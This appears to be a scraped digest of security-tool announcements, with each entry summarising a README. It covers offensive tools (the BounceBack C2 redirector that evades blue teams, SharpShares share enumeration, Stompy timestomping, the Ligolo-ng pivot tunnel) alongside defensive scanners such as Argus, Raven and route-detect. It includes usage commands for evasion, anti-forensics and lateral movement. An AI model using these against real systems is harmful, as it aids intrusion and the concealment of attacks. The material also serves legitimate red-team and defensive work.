BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.

The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.

For more information on tool usage, you may visit project's wiki.


Features

  • Highly configurable and customizable filters pipeline with boolean-based concatenation of rules will be able to hide your infrastructure from the most keen blue eyes.
  • Easily extendable project structure, everyone can add rules for their own C2.
  • Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors combined with IP filter to disallow them to use/attack your infrastructure.
  • Malleable C2 Profile parser is able to validate inbound HTTP(s) traffic against the Malleable's config and reject invalidated packets.
  • Out of the box domain fronting support allows you to hide your infrastructure a little bit more.
  • Ability to check the IPv4 address of request against IP Geolocation/reverse lookup data and compare it to specified regular expressions to exclude out peers connecting outside allowed companies, nations, cities, domains, etc.
  • All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.
  • Support for multiple proxies with different filter pipelines at one BounceBack instance.
  • Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debug issues.

Rules

BounceBack currently supports the following filters:

  • Boolean-based (and, or, not) rules combinations
  • IP and subnet analysis
  • IP geolocation fields inspection
  • Reverse lookup domain probe
  • Raw packet regexp matching
  • Malleable C2 profiles traffic validation
  • Work (or not) hours rule

Custom rules may be easily added, just register your RuleBaseCreator or RuleWrapperCreator. See already created RuleBaseCreators and RuleWrapperCreators

Rules configuration page may be found here.

Proxies

At the moment, BounceBack supports the following protocols:

  • HTTP(s) for your web infrastructure
  • DNS for your DNS tunnels
  • Raw TCP (with or without tls) and UDP for custom protocols

Custom protocols may be easily added, just register your new type in manager. Example proxy realizations may be found here.

Proxies configuration page may be found here.

Installation

Just download latest release from release page, unzip it, edit config file and go on.

If you want to build it from source, install goreleaser and run:

goreleaser release --clean --snapshot


SharpShares - Multithreaded C# .NET Assembly To Enumerate Accessible Network Shares In A Domain

By: Zion3R


Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain


Built upon djhohnstein's SharpShares project

> .\SharpShares.exe help

Usage:
SharpShares.exe /threads:50 /ldap:servers /ou:"OU=Special Servers,DC=example,DC=local" /filter:SYSVOL,NETLOGON,IPC$,PRINT$ /verbose /outfile:C:\path\to\file.txt

Optional Arguments:
/threads - specify maximum number of parallel threads (default=25)
/dc - specify domain controller to query (if not ran on a domain-joined host)
/domain - specify domain name (if not ran on a domain-joined host)
/ldap - query hosts from the following LDAP filters (default=all)
:all - All enabled computers with 'primary' group 'Domain Computers'
:dc - All enabled Domain Controllers (not read-only DCs)
:exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs
:servers - All enabled servers
:servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs
/ou - specify LDAP OU to query enabled computer objects from
ex: "OU=Special Servers,DC=example,DC=local"
/stealth - list share names without performing read/write access checks
/filter - list of comma-separated shares to exclude from enumeration
default: SYSVOL,NETLOGON,IPC$,PRINT$
/outfile - specify file for shares to be appended to instead of printing to std out
/verbose - return unauthorized shares

Execute Assembly

execute-assembly /path/to/SharpShares.exe /ldap:all /filter:sysvol,netlogon,ipc$,print$

Example Output

Specifying Targets

The /ldap and /ou flags can be used together or seprately to generate a list of hosts to enumerate.

All hosts returned from these flags are combined and deduplicated before enumeration starts.



Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

By: Zion3R


navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


Techniques

Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:

Heuristics

navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.

Brute-force

navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.

Installation

git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build

Acknowledgements



Argus - A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions

By: Zion3R

This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.

Visit our website - secureci.org for more information.


Features

  • Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.

  • Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.

Usage

This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.

python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]

Parameters:

  • --mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
  • --url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
  • --output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
  • --config: The config file. This parameter is optional.
  • --verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
  • --branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
  • --workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.

Example:

To use this script to interact with a GitHub repo, you might run a command like the following:

python argus.py --mode repo --url https://github.com/username/repo.git --branch master

This would run the script in repo mode on the master branch of the specified repository.

How to use

Argus can be run inside a docker container. To do so, follow the steps:

  • Install docker and docker-compose
    • apt-get -y install docker.io docker-compose
  • Clone the release branch of this repo
    • git clone <>
  • Build the docker container
    • docker-compose build
  • Now you can run argus. Example run:
    • docker-compose run argus --mode {mode} --url {url to target repo}
  • Results will be available inside the results folder

Viewing SARIF Results

You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.

  1. Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.

  2. VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.

Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.

Troubleshooting

If there is an issue with needing the Github authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.

Contributions

Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!

Cite Argus

If you use Argus in your research, please cite our paper:

  @inproceedings{muralee2023Argus,
title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
A. Kapravelos, A. Machiry},
booktitle={32st USENIX Security Symposium (USENIX Security 23)},
year={2023},
}


Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R


Nemesis is an offensive data enrichment pipeline and operator support system.

Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup

See development.md

Further Reading

Post Name Publication Date Link
Hacking With Your Nemesis Aug 9, 2023 https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
Challenges In Post-Exploitation Workflows Aug 2, 2023 https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
On (Structured) Data Jul 26, 2023 https://posts.specterops.io/on-structured-data-707b7d9876c6

Acknowledgments

Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



Melee - Tool To Detect Infections In MySQL Instances

By: Zion3R

MELEE: A Tool to Detect Ransomware Infections in MySQL Instances


Attackers are abusing MySQL instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MySQL instances and triggering infections at scale to exfiltrate data, destruct data, and extort money via ransom. For example one of the significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release of the tool, the following modules are supported:

  • MySQL instance information gathering and reconnaissance
  • MySQL instance exposure to the Internet
  • MySQL access permissions for assessing remote command execution
  • MySQL user enumeration
  • MySQL ransomware infections
  • Basic assessment checks for detecting ransomware infections
  • Extensive assessment checks for extracting insidious details about potential ransomware infections
  • MySQL ransomware detection and scanning for both unauthenticated and authenticated deployments

Tool Usage

Researched and Developed By Aditya K Sood and Rohit BansalΒ 

Sncscan - Tool For Analyzing SAP Secure Network Communications (SNC)

By: Zion3R


Tool for analyzing SAP Secure Network Communications (SNC).

How to use?

In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.


SAP Router

SAP Routers can either support SNC or not, a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan find out if it is activated:

sncscan -H 10.3.161.4 -S 3299 -p router

DIAG / SAP GUI

The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailled overview of the system parameterss that can be read with sncscan and impact the connections security is in the section Background

sncscan -H 10.3.161.3 -S 3200 -p diag

Multiple targets can be scanned with one command:

sncscan -L /H/192.168.56.101/S/3200,/H/192.168.56.102/S/3206 

Through SAP Router

sncscan --route-string /H/10.3.161.5/S/3299/H/10.3.161.3/S/3200 -p diag

Install

Requirements: Currently the sncscan only works with the pysap libary from our fork.

python3 -m pip install -r requirements.txt

or

python3 setup.py test
python3 setup.py install

Background: SNC system parameters

SNC Basics

SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:

  1. Authentication only: Verifies the identity of the communication partners
  2. Integrity protection: Protection against manipulation of the data
  3. Confidentiality protection: Encrypts the transmitted messages

SNC Parameter

Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:

  • snc/data_protection/min: Minimum security level required for SNC connections.
  • snc/data_protection/max: highest security level, initiated by the SAP system
  • snc/data_protection/use: default security level, initiated from the SAP system

Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.

Reading out SNC Parameters

As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.



Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp

By: Zion3R


A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.

  • Change timestamps for individual files or directories.
  • Recursively apply timestamps to all files in a directory.
  • Option to use specific credentials for remote paths or privileged files.

I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.

Usage

  • -Path: The path to the file or directory whose timestamps you wish to modify.
  • -NewTimestamp: The new DateTime value you wish to set for the file or directory.
  • -Credentials: (Optional) If you need to specify a different user's credentials.
  • -Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.

Usage Examples

Specify the -Recurse switch to apply timestamps recursively:

  1. Change the timestamp of an individual file:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
  1. Recursively change timestamps for all files in a directory:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse 
  1. Use specific credentials:

PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests

By: Zion3R


With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.

To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.

Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.

Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.

To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.

TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.


Requirements

The project is based on Azure Pipelines and requires the following to be able to run:

  • Azure Service Connection to a resource group as described in the Microsoft Docs
  • Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
  • MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines

Optional

You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.

Refer to the variables file for your configurable items.

Design

Infrastructure

Deploying the infrastructure uses the Azure Pipeline to perform the following steps:

  • Deploy Azure services:
    • Key Vault
    • Log Analytics Workspace
    • Data Connection Endpoint
    • Data Connection Rule
  • Generate SSH keypair and password for the Windows account and store in the Key Vault
  • Create a Windows 11 VM
  • Install OpenSSH
  • Configure and deploy the SSH public key
  • Install Invoke-AtomicRedTeam
  • Install Microsoft Defender for Endpoint and configure exceptions
  • (Optional) Apply security and/or audit policy files
  • Reboot

Simulation

Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:

  • T1059.003
  • T1027,T1049,T1003

The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.

There are currently two ways to run the simulation:

Rotating simulation

This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.

Warning: this will onboard a large number of hosts into your EDR

Single deploy simulation

A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.

TODO

Must have

  • Check if pre-reqs have been fullfilled before executing the atomic
  • Provide the ability to import own group policy
  • Cleanup biceps and pipelines by using a master template (Complete build)
  • Build pipeline that runs technique sequently with reboots in between
  • Add Azure ServiceConnection to variables instead of parameters

Nice to have

  • MDE Off-boarding (?)
  • Automatically join and leave AD domain
  • Make Atomics repository configureable
  • Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
  • Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
  • Add C2 infrastructure for manual or C2 based simulations

Issues

  • Atomics do not return if a simulation succeeded or not
  • Unreliable OpenSSH extension installer failing infrastructure deployment
  • Spamming onboarded devices in the EDR

References



BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



Raven - CI/CD Security Analyzer

By: Zion3R


RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd party integration risks, the most popular project on GitHub, and thousands more.
  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to setup the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.

Prerequisites

  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+

Infrastructure

Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

Usage

The tool contains three main functionalities, download and index and report.

Download

Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000

Index

usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
--debug Whether to print debug statements, default: False

Report

usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
{slack}
slack Send report to slack channel

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)

Examples

Retrieve all workflows and actions associated with the organization.

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour

Research Knowledge Base

Current Limitations

  • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
  • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



Route-Detect - Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes

By: Zion3R


Find authentication (authn) and authorization (authz) security bugs in web application routes:


Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:

Supported web frameworks (route-detect IDs in parentheses):

  • Python: Django (django, django-rest-framework), Flask (flask), Sanic (sanic)
  • PHP: Laravel (laravel), Symfony (symfony), CakePHP (cakephp)
  • Ruby: Rails* (rails), Grape (grape)
  • Java: JAX-RS (jax-rs), Spring (spring)
  • Go: Gorilla (gorilla), Gin (gin), Chi (chi)
  • JavaScript/TypeScript: Express (express), React (react), Angular (angular)

*Rails support is limited. Please see this issue for more information.

Installing

Use pip to install route-detect:

$ python -m pip install --upgrade route-detect

You can check that route-detect is installed correctly with the following command:

$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -
Scanning 1 file.

Findings:

/tmp/stdin
routes.rules.test-route-detect
Found '1 == 1', your route-detect installation is working correctly

1Ò”† print(1 == 1)


Ran 1 rule on 1 file: 1 finding.

Using

route-detect provides the routes CLI command and uses semgrep to search for routes.

Use the which subcommand to point semgrep at the correct web application rules:

$ semgrep --config $(routes which django) path/to/django/code

Use the viz subcommand to visualize route information in your browser:

$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code
$ routes viz --browser routes.json

If you're not sure which framework to look for, you can use the special all ID to check everything:

$ semgrep --json --config $(routes which all) --output routes.json path/to/code

If you have custom authn or authz logic, you can copy route-detect's rules:

$ cp $(routes which django) my-django.yml

Then you can modify the rule as necessary and run it like above:

$ semgrep --json --config my-django.yml --output routes.json path/to/django/code
$ routes viz --browser routes.json

Contributing

route-detect uses poetry for dependency and configuration management.

Before proceeding, install project dependencies with the following command:

$ poetry install --with dev

Linting

Lint all project files with the following command:

$ poetry run pre-commit run --all-files

Testing

Run Python tests with the following command:

$ poetry run pytest --cov

Run Semgrep rule tests with the following command:

$ poetry run semgrep --test --config routes/rules/ tests/test_rules/


Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

  • SYN are translated to connect() on remote
  • SYN-ACK is sent back if connect() succeed
  • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
  • Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

